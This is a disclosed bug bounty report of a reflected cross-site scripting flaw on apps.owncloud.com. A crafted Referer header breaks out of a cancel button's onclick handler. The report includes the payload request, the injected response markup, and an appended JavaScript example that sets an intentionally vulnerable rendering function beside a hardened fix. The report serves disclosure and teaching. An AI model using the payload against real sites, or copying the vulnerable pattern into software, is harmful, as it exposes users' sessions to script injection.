apps.owncloud.com: XSS via referrer

Disclosed: 2015-10-11 07:05:31 By psych0tr1a To owncloud
Vulnerability Details
Look at the next request:

    Host: apps.owncloud.com
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://www.myevilsite.com/qwe';alert(1)+'

In the response page, the referrer is pasted into the onclick event of a cancel button:

    onclick="location.href='http://www.myevilsite.com/qwe';alert(1)+'?PHPSESSID=icqgmh3h639vn6a75j6idmj935'" />
Report Stats
  • Report ID: 83374
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
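The injection point in the report above, shown beside a hardened rendering. This is an added example, not part of the original report and not ownCloud's code. The function names, SITE_ORIGIN, FALLBACK and the button markup are assumptions made for illustration.

```javascript
// Added example, not ownCloud's code. SITE_ORIGIN and FALLBACK are assumed values.
const SITE_ORIGIN = "https://apps.owncloud.com";
const FALLBACK = "/"; // assumed safe default target for the cancel button

// Escape a value for use inside a quoted HTML attribute.
function escapeAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Pattern from the report: the Referer header is concatenated into a
// JavaScript string literal inside onclick, so a single quote in the
// header ends the literal and the rest runs as script on click.
function renderCancelVulnerable(referer, sessionId) {
  return `<input type="button" value="Cancel" ` +
    `onclick="location.href='${referer}?PHPSESSID=${sessionId}'" />`;
}

// Accept the Referer only if it parses as a URL on our own origin.
// The normalised absolute URL is returned so that a path beginning
// with "//" cannot be read as a protocol-relative link to another host.
function safeReturnTarget(referer) {
  try {
    const u = new URL(referer);
    return u.origin === SITE_ORIGIN ? u.href : FALLBACK;
  } catch {
    return FALLBACK; // missing or unparseable header
  }
}

// Hardened: no inline script context at all. The validated target goes
// into href with attribute escaping, and the session id stays out of the
// URL (it belongs in the cookie).
function renderCancelHardened(referer) {
  const target = escapeAttr(safeReturnTarget(referer));
  return `<a class="button" href="${target}">Cancel</a>`;
}
```

The origin check and the escaping cover different cases: a foreign or malformed Referer is dropped, and a same-origin Referer that still contains a quote stays inert inside the attribute.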